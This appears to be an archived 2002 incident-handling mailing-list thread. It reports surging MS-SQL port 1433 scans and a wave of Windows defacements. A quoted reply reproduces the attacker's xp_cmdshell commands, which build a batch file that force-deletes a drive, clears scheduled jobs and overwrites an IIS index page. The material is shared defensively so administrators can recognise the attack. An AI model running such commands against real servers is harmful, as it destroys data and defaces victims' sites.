-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SQL probe reports to DShield skyrocketed today. It looks like a small number of sources scanning large IP ranges one after another. http://www.dshield.org/port_report.php?port=1433 On Fri, 3 May 2002, Brenna Primrose wrote: > I saw SQL probes today on several of our systems from wanadoo.fr -- > coincidence? I think not. Wanadoo.fr is infamous for looking for FTP > servers to crack. Hmmm... > > > AIM - abosolut x psycho > Yahoo! - absolut_contagion > ICQ - 1363187 > http://gsa.creighton.edu > http://profiles.yahoo.com/absolut_contagion > -----BEGIN GEEK CODE BLOCK----- > Version: 3.12 > GSS d-- s: a-- C++ UL++++ P+ L+ E W++ N+ o-- K- w+ > O-- M V-- PS++ PE Y+ PGP- t-- 5-- X++ R- tv+ b+++ DI D+ > G e* h- r++ x+ > ------END GEEK CODE BLOCK------ > > -----Original Message----- > From: Steve Zenone [mailto:zenoneat_private] > Sent: Thursday, May 02, 2002 10:24 PM > To: incidentsat_private > Cc: thompsonat_private > Subject: RE: Windows Systems Defaced > > Hello, > > Stephen W. Thompson wrote: > |> Have any of you seen similar activity? Any thoughts? > | > |Yes, we had one that matches most of your details. These > |are exact matches: > | > |> [] Damage occurred around 1600 on 5/1/2002 > |BUT=> (approx. 16:00 EDT for us) > |> [] Win-popup message with "F---ing University of Rochester" > |> -- NOTE: not all systems running IIS > |> [] Admins claimed that all systems were patched correctly > |> [] Most were running updated and current AV > > Thank you very much for your reply - it definitely helps! > > We have been seeing MS-SQL (1433/tcp) attacks that try and execute > the following: > > -----BEGIN SNIPPET----- > xp_cmdshell 'echo net send localhost F---ing University of Rochester > > rebooting... > rochester.bat' > > xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat' > > xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat' > > xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat' > > xp_cmdshell 'at /delete /y' > > xp_cmdshell 'echo if exist \inetpub\wwwroot\ type > %systemroot%\rochester.html ^ e:\inetpub\wwwroot\index.html >> > rochester.bat' > -----END SNIPPET----- > > > > > > ---------------------------------------------------------------------------- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com > > > - -- - ------- jullrichat_private Join http://www.DShield.org Distributed Intrusion Detection System -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE80tptwWQP+4im9DYRAvS6AKCx/JaYmx1fI6nEn8oHCmqFoPMaBgCfRok0 LayncBWEGwAz57XdPsdeMpA= =eakE -----END PGP SIGNATURE----- ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Fri May 03 2002 - 12:19:25 PDT